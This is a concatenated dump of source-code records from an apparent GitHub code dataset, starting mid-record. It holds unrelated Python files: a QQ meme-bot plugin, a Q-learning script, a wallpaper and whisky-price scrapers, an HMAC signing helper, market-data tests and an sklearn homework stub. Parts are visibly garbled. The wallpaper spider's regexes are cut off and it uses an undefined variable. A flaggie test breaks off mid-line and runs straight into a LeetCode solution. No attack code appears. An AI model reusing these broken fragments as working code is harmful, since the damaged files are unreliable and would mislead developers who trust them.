DefaultType\n\nGENDERS = {\n \"male\": \"他\",\n \"female\": \"她\",\n \"unknown\": \"它\",\n \"animal\": \"牠\",\n \"god\": \"祂\",\n}\n\n\n@overload\ndef vertical_gradient(\n mode: str, top: int, bottom: int, width: int, height: int\n) -> Image.Image: ...\n\n@overload\ndef vertical_gradient(\n mode: str, top: Tuple[int, ...], bottom: Tuple[int, ...], width: int, height: int\n) -> Image.Image: ...\n\ndef vertical_gradient(\n mode: str, top: Union[int, Tuple[int, ...]], bottom: Union[int, Tuple[int, ...]], width: int,\n height: int\n) -> Image.Image:\n gradient = Image.new(mode, (1, height))\n px = gradient.load()\n if isinstance(bottom, tuple) and isinstance(top, tuple):\n delta = tuple(x - y for x, y in zip(bottom, top))\n for i in range(height):\n ratio = i / (height - 1)\n px[0, i] = tuple(int(ratio * x + y) for x, y in zip(delta, top))\n elif isinstance(bottom, int) and isinstance(top, int):\n delta = bottom - top\n for i in range(height):\n px[0, i] = int(delta * (i / (height - 1))) + top\n else:\n raise TypeError\n return gradient.resize((width, height))\n\n\nparser = ArgumentParser(add_help=False)\nparser.add_argument(\"target\", nargs=\"?\", default=\"\", metavar=\"目标\", help=(\n \"可使用@、QQ号、昵称、群名片或图片链接\"\n))\nparser.add_argument(\"--name\", \"-n\", metavar=\"名字\", help=(\n \"自定义名字,对于图片链接必须指定,对于QQ用户默认使用昵称\"\n))\nparser.add_argument(\"--gender\", \"-g\", choices=GENDERS, metavar=\"性别\", help=(\n \"自定义性别,对于图片链接默认为未知,对于QQ用户默认为资料性别,\"\n \"可以是“male”(他)、“female”(她)、“unknown”(它)、“animal”(牠)、“god”(祂)\"\n))\nmatcher = (\n command.CommandBuilder(\"meme_pic.ask\", \"问\", \"问问\")\n .category(\"meme_pic\")\n .shell(parser)\n .build()\n)\n@matcher.handle()\nasync def handler(bot: Bot, event: MessageEvent, args: Namespace = ShellCommandArgs()) -> None:\n async with AvatarGetter(bot, event) as g:\n target_task = g(args.target, DefaultType.TARGET)\n target, target_id = target_task.result()\n name = args.name\n gender = args.gender\n if (name is None or gender is None) and target_id is not None:\n try:\n info = await bot.get_group_member_info(\n group_id=context.get_event_context(event), user_id=target_id\n )\n name = name or info[\"card\"] or info[\"nickname\"]\n gender = gender or info[\"sex\"]\n except ActionFailed:\n info = await bot.get_stranger_info(user_id=target_id)\n name = name or info[\"nickname\"]\n gender = gender or info[\"sex\"]\n if gender is None:\n gender = \"unknown\"\n if name is None:\n await matcher.finish(\"请使用 --name 指定名字\")\n\n def make() -> MessageSegment:\n nonlocal target\n target = target.resize((640, 640), imutil.scale_resample())\n gradient_h = 150\n padding_x = 30\n padding_y = 80\n text_x = padding_x + 30\n text_y = padding_y + target.height - gradient_h\n\n im = Image.new(\n \"RGB\", (target.width + padding_x * 2, target.height + padding_y * 2), (255, 255, 255)\n )\n im.paste(target, (padding_x, padding_y), target)\n im.paste(\n (0, 0, 0), (padding_x, text_y), vertical_gradient(\"L\", 192, 128, target.width, gradient_h)\n )\n\n textutil.paste(im, (padding_x, padding_y // 2), f\"让{name}告诉你吧\", \"sans\", 35, anchor=\"lm\")\n text_im = textutil.paste(im, (text_x, text_y + 5), name, \"sans bold\", 25, color=(255, 165, 0))\n im.paste((255, 165, 0), (text_x - 5, text_y + 45, text_x + text_im.width + 5, text_y + 47))\n textutil.paste(\n im, (text_x, text_y + 50), f\"{name}不知道哦\", \"sans bold\", 25, color=(255, 255, 255)\n )\n textutil.paste(\n im, (padding_x, target.height + padding_y + padding_y // 2),\n f\"啊这,{GENDERS[gender]}说不知道\", \"sans\", 35, anchor=\"lm\"\n )\n\n return imutil.to_segment(im)\n\n await matcher.finish(await misc.to_thread(make))\n","repo_name":"su226/IdhagnBot","sub_path":"plugins/meme_pic/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":4317,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"521223850","text":"import gym\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nSEED = 1314\n\ndef q_learning(LR, DSCT, RES_IDX):\n NUM_EP = 2000\n env = gym.make('FrozenLake-v0')\n Q = np.zeros([env.observation_space.n, env.action_space.n])\n rList = []\n \n for i in range(NUM_EP):\n env.seed(SEED)\n state = env.reset()\n rAll = 0\n done = False\n\n while not done:\n # add decaying-random noise\n # standard normal random, (1 x num_of_actions) array\n action = np.argmax(Q[state, :] + np.random.randn(1, env.action_space.n) / (i + 1))\n new_state, reward, done, _ = env.step(action)\n Q[state, action] = (1-LR) * Q[state, action] + LR * (reward + DSCT * np.max(Q[new_state, :]))\n state = new_state\n rAll += reward\n rList.append(rAll)\n score = str(sum(rList)/NUM_EP)\n print(f\"Score over time: {score}\")\n print(\"Final Q-Table Values\")\n print(Q) \n plt.bar(range(len(rList)), rList, color='blue')\n plt.title(f'Learning Rate: {(LR):.3f}, Discount: {DSCT}, Score: {score}')\n plt.savefig(f'./plot_res/result_{RES_IDX}.png')\n plt.show()\n env.close()\n \nlearning_rate_list = [round(i, 3) for i in np.linspace(.8, .99, 5).tolist()]\ndis_list = [round(i, 3) for i in np.linspace(.8, .99, 5).tolist()]\n\nres_idx = 0\nfor lr in learning_rate_list:\n for dsct in dis_list:\n q_learning(lr, dsct, res_idx) \n res_idx += 1","repo_name":"Gaebobman/Reinforcement_Learning","sub_path":"Q_Learning/frozen_q_learning.py","file_name":"frozen_q_learning.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26491306991","text":"\"\"\"\n请撰写一程式,用numpy做出以下的ndarray,并输出以下资料:\n 1.红框圈起的四个角落的值\n 2.黄框圈起的值\n 3.计算每一排的总合\n\"\"\"\nimport numpy as np\n#制作题目规定之numpy\nall=np.array([])\nfor i in range(6):\n temp=np.arange(10*i,10*i+6)\n all=np.r_[all,temp]\nall=all.reshape(6,6)\n","repo_name":"PeiYun722/MyPythonExercise","sub_path":"Exercise11_29_徐珮芸.py","file_name":"Exercise11_29_徐珮芸.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11801873260","text":"from requests import get\nfrom re import search, findall, sub\n\nfrom . import BaseSpider\n\nclass Bestwallpaper(BaseSpider):\n def __init__(self, father):\n super(Bestwallpaper, self).__init__(father, self.__class__.__name__)\n\n self.b64_data = b'iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAA30lEQVR4nGM8rhn5n4ECwMTAwMAgHuECFxCPcIHziWEzUsUFA2oAw8eTV/9jA8c1I7Gyny3cBuf//vT1P9wF1xJaGE5oRRG0UDLOk0E00I6BgYGB4cWi7dhdALMFJvd4ypr///////92z+n////////l+gO4y+AueL3+EMOTqWvhtjAwMDC8WLyDgYGBgUEmO5iBgYGB4WHHYgYGBgYGbg15uIsQBmyEGPDn8zcGBgYGBj4zLYZ3e8/AFX698ZDh59PXGF5igTG0FtSgSHw6dQ2FD7MdBmCGD5KENLTzAgCKP7G7JrpUYAAAAABJRU5ErkJggg=='\n self.cate = ['随机', 'Abstract', 'Animals', 'Cute', 'Creative', 'Flowers', 'Design', 'Games', 'Movies', 'Nature', 'World']\n self.true_cate = ['3D-and-Abstract', 'Animals-and-Birds', 'Cute', 'Creative-and-Graphics', 'Flowers', 'Vector-and-Design', 'Games', 'Movies', 'Nature-and-Landscape', 'Travel-and-World']\n\n def a_page_spider(self, cate):\n return ''.join(get('https://best-wallpaper.net/%s_desktop_wallpapers/page/%s' % (self.true_cate[self.cate.index(cate)-1], str(self.father.data['api'][self.name]['cate_page'][cate])), headers=self.headers, timeout=self.father.config['timeout']).text.split())\n\n def a_page_finder(self, r, c):\n new_set = findall(r'\\d*x\\d*.*?', r)\n best = [100000, 100000, 0]\n for i in resolution:\n sub_ = [int(i[1]) - self.father.resolving[0], int(i[2]) - self.father.resolving[1]]\n if 0 <= sub_[0] < best[0] and 0 <= sub_[1] < best[1]:\n best = [*sub_, i[0]]\n if best[-1] != 0:\n img = get(best[2], headers=self.headers, stream=True, timeout=self.father.config['timeout'])\n tail = search('.*?([jpnegJPENG]{3,4})$', img.headers['Content-Type']).group(1)\n return img, tail\n else:\n return False","repo_name":"yunyuyuan/PyQt5","sub_path":"wallpaper switcher/api/Bestwallpaper.py","file_name":"Bestwallpaper.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"73317200166","text":"import numpy as np\r\n\r\n\r\nclass NeuralNetwork(object):\r\n def __init__(self, learning_rate=0.1):\r\n self.weights_0_1 = np.random.normal(0.0, 2 ** -0.5, (3, 4))\r\n self.weights_1_2 = np.random.normal(0.0, 1, (1, 3))\r\n self.sigmoid_mapper = np.vectorize(self.sigmoid)\r\n self.lineal_mapper = np.vectorize(self.lineal)\r\n self.learning_rate = np.array([learning_rate])\r\n\r\n @staticmethod\r\n def sigmoid(x):\r\n return 1 / (1 + np.exp(-x))\r\n\r\n @staticmethod\r\n def lineal(x):\r\n return (x > 0) * x\r\n \r\n def predict(self, inputs):\r\n inputs_1 = np.dot(self.weights_0_1, inputs)\r\n outputs_1 = self.sigmoid_mapper(inputs_1)\r\n inputs_2 = np.dot(self.weights_1_2, outputs_1)\r\n outputs_2 = self.lineal_mapper(inputs_2)\r\n return outputs_2\r\n \r\n def train(self, inputs, expected_predict): \r\n inputs_1 = np.dot(self.weights_0_1, inputs)\r\n outputs_1 = self.sigmoid_mapper(inputs_1)\r\n\r\n inputs_2 = np.dot(self.weights_1_2, outputs_1)\r\n outputs_2 = self.sigmoid_mapper(inputs_2)\r\n\r\n actual_predict = outputs_2[0]\r\n \r\n error_layer_2 = np.array([actual_predict - expected_predict])\r\n gradient_layer_2 = actual_predict * (1 - actual_predict)\r\n weights_delta_layer_2 = error_layer_2 * gradient_layer_2\r\n self.weights_1_2 -= (np.dot(weights_delta_layer_2, outputs_1.reshape(1, len(outputs_1)))) * self.learning_rate\r\n \r\n error_layer_1 = weights_delta_layer_2 * self.weights_1_2\r\n gradient_layer_1 = outputs_1 * (1 - outputs_1)\r\n weights_delta_layer_1 = error_layer_1 * gradient_layer_1\r\n self.weights_0_1 -= np.dot(inputs.reshape(len(inputs), 1), weights_delta_layer_1).T * self.learning_rate\r\n","repo_name":"alyukovnet/timemanager","sub_path":"core/neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2789509767","text":"import scrapy\n\nBASE_URL = \"https://www.alkohol.cz\"\n\n\nclass GetDrunk(scrapy.Spider):\n name = \"alkohol\"\n start_urls = [\"https://www.alkohol.cz/produkty/whisky/kategorie/\"]\n\n def format_price(self, raw_price):\n if not raw_price:\n return 0\n price = \"\"\n for el in raw_price:\n if el.isdigit(): # tmp solution\n price += el\n return int(price)\n\n def parse(self, response):\n product_box = response.css(\"div.products-box\")\n products = product_box.css(\"div.info\")\n\n for product in products:\n name = product.css(\"a.link-color::text\").get().strip()\n link = BASE_URL + product.css(\"a.link-color::attr(href)\").get()\n price_text = product.css(\"span.price::text\")\n if len(price_text) > 2: # bottle in sale\n raw_price = product.css(\"span.price::text\")[1].get().strip()\n price = self.format_price(raw_price)\n sale = True\n else:\n raw_price = product.css(\"span.price::text\").get().strip()\n price = self.format_price(raw_price)\n sale = False\n item = {\n \"name\": name,\n \"price\": price,\n \"sale\": sale,\n \"link\": link\n }\n yield item\n\n next_page = BASE_URL + response.css(\"a.noAjaxHistory.link.paging-button.paging-button-last::attr(href)\").get()\n if next_page is not None:\n yield response.follow(next_page, callback=self.parse)\n\n\n","repo_name":"petrsevcik/scraping","sub_path":"alkohol/alkohol/spiders/alkohol_cz.py","file_name":"alkohol_cz.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28717163629","text":"# (c) 2023 Michał Górny\n# Released under the terms of the MIT license\n\nimport argparse\n\nimport pytest\n\nfrom flaggie.__main__ import (split_arg_sets, split_op,\n namespace_into_token_group,\n )\nfrom flaggie.config import TokenType\n\n\n@pytest.mark.parametrize(\n \"args,expected\",\n [([\"+foo\", \"-bar\"], [([], [\"+foo\", \"-bar\"])]),\n ([\"dev-foo/bar\", \"+foo\"], [([\"dev-foo/bar\"], [\"+foo\"])]),\n ([\"dev-foo/bar\", \"baz\", \"-foo\"],\n [([\"dev-foo/bar\", \"baz\"], [\"-foo\"])]),\n ([\"+foo\", \"dev-foo/*\", \"-foo\"],\n [([], [\"+foo\"]), ([\"dev-foo/*\"], [\"-foo\"])]),\n ([\">=dev-foo/bar-11-r1\", \"+foo\"], [([\">=dev-foo/bar-11-r1\"], [\"+foo\"])]),\n ([\" 0:\n s = 1\n elif x < 0:\n s = -1\n else:\n s = 0\n r = int(str(abs(x))[::-1])\n return r*s*(r < 2**31)\n\nsolve = Solution()\nprint(solve.reverse(-23))","repo_name":"purelind/LeetCode","sub_path":"reverse_integer.py","file_name":"reverse_integer.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15948699156","text":"from urllib import request\nimport re, json\n\ndef getImage(kw):\n urlExp = \"http://image.baidu.com/search/flip?tn=baiduimage&ie=utf-8&word={0}&ct=201326592&v=flip\"\n reExp = r'\"thumbURL\":\"(http://.*?\\.jpg)\"'\n # transfer keyword to unicode\n kw_bytes = kw.encode(\"utf-8\")\n kw_unicode = str(kw_bytes).replace(r\"\\x\", \"%\").replace(\"'\", \"\") # remove ' and replace \\x with %\n kw_unicode = re.sub(r\"^b\", \"\", kw_unicode) # remove b char\n search_url = urlExp.format(kw_unicode)\n with request.urlopen(search_url) as rq:\n pageCode = rq.read()\n pageCode = str(pageCode, encoding=\"utf-8\", errors=\"ignore\")\n img_url = re.search(reExp, pageCode).group(1)\n return img_url\n\ndef crawlImages():\n with open(\"../static/poet2image.json\", \"w\") as fw, open(\"../static/poems.json\", \"r\") as fr:\n data = json.load(fr)\n poet2image = {}\n for key in data.keys():\n author = data[key]['author']\n print(author)\n if author not in poet2image:\n poet2image[author] = getImage(author)\n json.dump(poet2image, fw)\ncrawlImages()\n'''\ndef test():\n keyword = u\"余光中\"\n getImage(keyword)\ntest()'''","repo_name":"chibinjiang/PoetryRecommender","sub_path":"app/DataCollector/baiduImageApi.py","file_name":"baiduImageApi.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26612063691","text":"from django.urls import path, include\n\nfrom rest_framework.routers import DefaultRouter\n\n# local imports\nfrom . import views, apps\n\napp_name= apps.PotConfig.name\n\nrouter = DefaultRouter()\nrouter.register(r'pots', views.PotViewSet, basename=\"pot\")\nrouter.register(r'currencies', views.CurrencyViewSet, basename=\"currency\")\n\nurlpatterns = [\n path('', include(router.urls))\n]\n\n","repo_name":"dekunle02/Cheesy","sub_path":"backend/Cheese/pot/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72306354726","text":"class Solution:\n def checkIfCanBreak(self, s1: str, s2: str) -> bool:\n \n if not s1 or not s2:\n return False\n \n if len(s1) == 0 or len(s2) == 0:\n return 0\n \n def sorted_ascii(s):\n \n res = [0] * len(s)\n s_list = list(s)\n for idx, item in enumerate(s_list):\n res.append(ord(item))\n \n res.sort()\n return res\n \n s1_ascii = sorted_ascii(s1)\n s2_ascii = sorted_ascii(s2)\n \n def compare(s1, s2):\n for i in range(0, len(s1)):\n if s1[i] < s2[i]:\n return False\n return True\n\n \n if compare(s1_ascii, s2_ascii) or compare(s2_ascii, s1_ascii):\n return True\n \n return False\n","repo_name":"mmkhaque/LeetCodeWeeklyChallenge","sub_path":"check_if_a_string_can_break_another_string_1433.py","file_name":"check_if_a_string_can_break_another_string_1433.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20150998326","text":"\"\"\"Test market_data module.\"\"\"\n\nfrom unittest.mock import Mock, patch\n\nimport finnhub\nimport pandas as pd\nimport pytest\nimport vcr\nfrom alpaca.trading import Asset as AlpacaAsset\n\nfrom optitrader.enums import UniverseName\nfrom optitrader.market import InvestmentUniverse, MarketData\nfrom optitrader.market.base_data_provider import BaseDataProvider\nfrom optitrader.market.db.database import MarketDB\nfrom optitrader.models import AssetModel\n\nmy_vcr = vcr.VCR(\n serializer=\"json\",\n cassette_library_dir=\"tests/cassettes\",\n record_mode=\"once\",\n match_on=[\"method\", \"scheme\", \"host\", \"port\", \"path\"],\n)\n\n\ndef test_base_provider() -> None:\n \"\"\"Test BaseDataProvider.\"\"\"\n with pytest.raises(TypeError, match=\"Can't instantiate abstract class BaseDataProvider\"):\n BaseDataProvider() # type: ignore\n with pytest.raises(TypeError, match=\"Can't instantiate abstract class BaseDataProvider\"):\n super(BaseDataProvider, BaseDataProvider()).__init__() # type: ignore\n\n\ndef test_use_db() -> None:\n \"\"\"Test BaseDataProvider.\"\"\"\n assert isinstance(MarketData(use_db=True)._db, MarketDB)\n with pytest.raises(AttributeError, match=\"has no attribute\"):\n MarketData(use_db=False)._db # noqa: B018\n\n\n@pytest.mark.vcr()\ndef test_load_prices(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n test_start_date: pd.Timestamp,\n test_end_date: pd.Timestamp,\n) -> None:\n \"\"\"Test load_prices method.\"\"\"\n prices = market_data.load_prices(\n tickers=test_tickers,\n start_date=test_start_date,\n end_date=test_end_date,\n )\n assert isinstance(prices, pd.DataFrame)\n assert sorted(prices.columns) == sorted(test_tickers)\n\n\n@vcr.use_cassette(\"tests/data/cassettes/test_load_prices.yaml\")\ndef test_get_total_returns(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n test_start_date: pd.Timestamp,\n test_end_date: pd.Timestamp,\n) -> None:\n \"\"\"Test get_total_returns method.\"\"\"\n returns = market_data.get_total_returns(\n tickers=test_tickers,\n start_date=test_start_date,\n end_date=test_end_date,\n )\n assert isinstance(returns, pd.DataFrame)\n assert sorted(returns.columns) == sorted(test_tickers)\n\n\n@pytest.mark.vcr()\ndef test_get_assets_from_provider(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n) -> None:\n \"\"\"Test get_assets_from_provider method.\"\"\"\n assets = market_data.get_assets_from_provider(\n tickers=test_tickers,\n )\n assert isinstance(assets, list)\n assert len(assets) <= len(test_tickers)\n assert all(isinstance(a, AssetModel) for a in assets)\n\n\ndef test_get_assets_from_provider_error(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n) -> None:\n \"\"\"Test get_assets_from_provider method.\"\"\"\n response = Mock()\n response.json = Mock(return_value={\"error\": \"test\"})\n with patch(\"asyncio.run\") as mock_run, patch(\"time.sleep\") as mock_sleep:\n mock_run.side_effect = finnhub.FinnhubAPIException(response)\n with pytest.raises(finnhub.FinnhubAPIException): # noqa: PT012\n market_data.get_assets_from_provider(\n tickers=test_tickers,\n )\n mock_sleep.assert_any_call()\n\n\n@pytest.mark.vcr()\ndef test_get_market_caps(\n market_data: MarketData,\n test_tickers: tuple[str, ...],\n test_start_date: pd.Timestamp,\n test_end_date: pd.Timestamp,\n) -> None:\n \"\"\"Test get_market_caps method.\"\"\"\n mkt_caps = market_data.get_market_caps(\n tickers=test_tickers,\n start_date=test_start_date,\n end_date=test_end_date,\n )\n assert isinstance(mkt_caps, pd.DataFrame)\n assert sorted(mkt_caps.columns) == sorted(test_tickers)\n\n\n@pytest.mark.vcr()\ndef test_get_tradable_tickers(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_tradable_tickers method.\"\"\"\n tickers = market_data.get_tradable_tickers()\n assert isinstance(tickers, tuple)\n assert isinstance(tickers[0], str)\n assert all(t.isupper() for t in tickers)\n\n\n@pytest.mark.vcr()\ndef test_get_asset_by_name(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_asset_by_name method.\"\"\"\n asset = market_data.get_asset_by_name(\n name=\"Apple\",\n )\n assert isinstance(asset, AlpacaAsset)\n\n\ndef test_get_asset_from_ticker_error(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_asset_from_ticker method.\"\"\"\n asset = market_data._get_asset_from_ticker(\n ticker=\"INVALID\",\n )\n assert asset is None\n\n\n@pytest.mark.vcr()\ndef test_get_asset(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_asset_from_ticker method.\"\"\"\n asset = market_data.get_asset_from_ticker(\n ticker=\"AAPL\",\n )\n assert isinstance(asset, AssetModel)\n\n\n@vcr.use_cassette(\"tests/data/cassettes/test_get_asset.yaml\")\ndef test_get_get_asset_from_ticker_nodb(\n market_data_nodb: MarketData,\n) -> None:\n \"\"\"Test get_asset_from_ticker method.\"\"\"\n assert not market_data_nodb.use_db\n _asset = market_data_nodb.get_asset_from_ticker(\n ticker=\"AAPL\",\n )\n assert isinstance(_asset, AssetModel)\n asset = market_data_nodb.get_asset(\n ticker=\"AAPL\",\n )\n assert isinstance(asset, AssetModel)\n assert asset == _asset\n\n\n@pytest.mark.vcr()\ndef test_get_assets(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_assets method.\"\"\"\n assets = market_data.get_assets()\n assert isinstance(assets, list)\n\n\n@pytest.mark.my_vcr()\ndef test_get_financials(\n market_data: MarketData,\n) -> None:\n \"\"\"Test get_total_returns method.\"\"\"\n fin_df = market_data.get_financials(\n ticker=\"AAPL\",\n )\n assert isinstance(fin_df, pd.DataFrame)\n\n\n@pytest.mark.my_vcr()\ndef test_investment_universe_with_top_market_cap(\n market_data: MarketData,\n) -> None:\n \"\"\"Test the investment universe initialization with the top_market_cap.\"\"\"\n _top = 2\n\n tickers = market_data.get_top_market_cap_tickers(\n top=_top, tickers=InvestmentUniverse(name=UniverseName.FAANG).tickers\n )\n assert len(tickers) == _top\n","repo_name":"Ale-Cas/optitrader","sub_path":"tests/market/test_market_data.py","file_name":"test_market_data.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2853203503","text":"# -*- coding: utf8 -*-\n__author__ = 'Jagerzhang'\nimport sys\nimport hmac\nimport hashlib\nimport base64\nimport time\n\n\nclass HmacAuth():\n \"\"\"生成Hmac(hmac-sha256)鉴权头部\n :param hmac_user, String, 可选, 在class初始化时预设HMAC账号,可被函数覆盖\n :param hmac_secret, String, 可选, 在class初始化时预设HMAC密钥,可被函数覆盖\n :return Class Object\n \"\"\"\n def __init__(self, hmac_user=None, hmac_secret=None):\n self.hmac_user = hmac_user\n self.hmac_secret = hmac_secret\n self.python_version = sys.version_info[0]\n\n def _sha256_digest(self, content):\n \"\"\" sha256计算内容摘要\n :param content, String, 内容\n \"\"\"\n if self.python_version > 2:\n content_bytes = bytes(content, \"utf-8\")\n\n else:\n content_bytes = bytes(content).decode(\"utf-8\")\n\n content_sha256_digest = hashlib.sha256(content_bytes).digest()\n content_sha256_digest_base64_decode = base64.b64encode(\n content_sha256_digest).decode()\n content_digest = 'SHA-256={0}'.format(\n content_sha256_digest_base64_decode)\n return content_digest\n\n def _hmac_sha256(self, secret, str_to_sign):\n \"\"\"生成sha256加密串\n :param secret, String, 指定密钥\n :param str_to_sign, String, 已拼装待签名的数据\n \"\"\"\n if self.python_version > 2:\n hmac_key = bytes(secret, \"utf-8\")\n msg_sign = bytes(str_to_sign, \"utf-8\")\n\n else:\n hmac_key = bytes(secret)\n msg_sign = bytes(str_to_sign)\n\n signature = hmac.new(hmac_key, msg_sign,\n digestmod=hashlib.sha256).digest()\n str_base64 = base64.b64encode(signature).decode()\n return str_base64\n\n def get_auth_headers(self, hmac_user=None, hmac_secret=None, body=\"\"):\n \"\"\"获取Hmac鉴权头部\n :param String, 可选, 指定Hmac账号,可以覆盖class预设的Hmac账号\n :param String, 可选, 指定hmac密钥,可以覆盖class预设的Hmac密钥\n :param String, 可选,指定请求Body内容,当网关要求验签body的时候必传,Get请求则传入空值\n :param Dict, 返回Hmac认证头部字典\n \"\"\"\n if not hmac_user:\n hmac_user = self.hmac_user\n\n if not hmac_secret:\n hmac_secret = self.hmac_secret\n\n # 生成body的sha256加密串\n body_digest = self._sha256_digest(body)\n\n # 生成当前GMT时间,注意格式不能改变,必须形如:Wed, 14 Aug 2019 09:09:28 GMT\n gm_time = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", time.gmtime())\n\n # 拼装待签名的数据\n str_to_sign = \"date: {0}\\ndigest: {1}\".format(gm_time, body_digest)\n\n # 生成签名\n signature = self._hmac_sha256(hmac_secret, str_to_sign)\n\n # 拼装headers\n headers = {}\n headers[\"Authorization\"] = (\n 'hmac username=\"{0}\", algorithm=\"hmac-sha256\", headers=\"date digest\",'\n 'signature=\"{1}\"'.format(hmac_user, signature))\n headers[\"Digest\"] = body_digest\n headers[\"Date\"] = gm_time\n return headers\n\n","repo_name":"jagerzhang/hmac-sdk","sub_path":"python/hmac_auth.py","file_name":"hmac_auth.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"41939051630","text":"import requests\nfrom bs4 import BeautifulSoup\n\ntarget_url = ''#twitter_url\nr = requests.get(target_url)\n\nsoup = BeautifulSoup(r.text,'lxml')\n\nmain_data = soup.find(\"p\", attrs={\"class\":\"TweetTextSize\"})\n\nprint('%s' %(main_data))\n\ndl_file = \"fm.txt\"\ntry:\n file = open(dl_file,'w')\n data = file.write(main_data)\nexcept Exception as e:\n print(e)\n print('error')\nfinally:\n file.close()\n\nprint('fin')\n","repo_name":"synic-m/tweetscraper","sub_path":"befor_v/scraping_test.py","file_name":"scraping_test.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8709699517","text":"#!/usr/bin/python\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom sklearn import impute\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import tree\nfrom sklearn.model_selection import KFold\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import datasets, linear_model\n# from sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_val_score\n# Each of the steps defined in the main() function calls one or more of the functions stubbed out\n# below. Fill in the function bodies below, paying attention to how they are called and what kinds\n# of values are returned. Wherever possible, you should use tools from the scikit-learn codebase\n# to accomplish each task; note that you'll have to include relevant import statements.\n#\ndef main(file_name):\n #\n # 0. Read in the data. Store the attributes in a pandas DataFrame called x, and class values\n # (last column) in a Series object called y.\n\n x, y = read_data(file_name)\n\n #\n # 1. Handle missing values in the data using an sklearn SimpleImputer. The transformed\n # data should be stored in a numpy array x_imp.\n x_imp = impute_data(x)\n\n #\n # 2. Split the imputed data into training and test sets, where 75% of the data is used for\n # training\n x_train, x_test, y_train, y_test = train_test_split(x_imp, y)\n\n # 3. Print out the class distributions for both training and test\n train_pos_count, train_neg_count = get_class_distrib(y_train)\n test_pos_count, test_neg_count = get_class_distrib(y_test)\n print(\"training class distrib: {:.2f}, {:.2f}\".format(train_pos_count/len(y_train),\n train_neg_count/len(y_train)))\n print(\"test class distrib: {:.2f}, {:.2f}\".format(test_pos_count/len(y_test),\n test_neg_count/len(y_test)))\n\n #\n # 4. Learn a decision tree model and get its accuracy on both the training and test data\n tree_clf = learn_tree(x_train, y_train)\n acc_train = test_model(tree_clf, x_train, y_train)\n acc_test = test_model(tree_clf, x_test, y_test)\n print(\"decision tree training acc: {:.4f}, test acc: {:.4f}\".format(acc_train, acc_test))\n\n #\n # 5. Print out the names of the top five most important features in the tree from 4. You can\n # access them through the feature_importances_ data member of the classifier object.\n for feat, score in top_features(tree_clf, x.columns, 5):\n print(\"{} ({:.4f})\".format(feat, score))\n\n #\n # 6. Repeat exercise 4, this time using a scikit-learn k-NN classifier that uses\n # a Euclidean distance metric. Print the test set accuracy obtained from using several\n # values of k. What is the best value of k?\n k_vals = [1, 3, 5, 7, 9, 19, 39, 79, 159, 319]\n for k in k_vals:\n knn_clf = learn_knn(x_train, y_train, k)\n acc_test = test_model(knn_clf, x_test, y_test)\n print(\"k-nn {} test acc: {:.4f}\".format(k, acc_test))\n\n #\n # 7. Repeat exercise 6, but this time scale the data first using the scikit-learn\n # StandardScaler to preprocess the data. Use the make_pipeline function() to create a\n # pipeline.\n for k in k_vals:\n knn_clf_std = learn_knn_standard(x_train, y_train, k)\n acc_test = test_model(knn_clf_std, x_test, y_test)\n print(\"k-nn {} (standardized) test acc: {:.4f}\".format(k, acc_test))\n\n #\n # 8. Now repeat the classification process from exercise 4, using 10-fold cross-validation\n # instead of the single training/test split.\n acc_test = crossval_tree(x_imp, y, 10)\n print(\"decision tree {}-fold cross-validation acc: {:.4f}\".format(10, acc_test))\n\n\n#\n# Fill in the function bodies for each of the functions below. The purpose of each is described\n# in the main() function above. The types of the return values can be found in the comments\n# below. Note that each has been initialized to None to enable incremental development of the code.\n#\n\ndef read_data(file_name):\n # Read in the data. Store the attributes in a pandas DataFrame called x, and class values\n # (last column) in a Series object called y.\n x = pd.read_csv(file_name)\n newX = x.drop(['class'], axis=1)\n y = x.iloc[:,-1]\n return newX, y # x 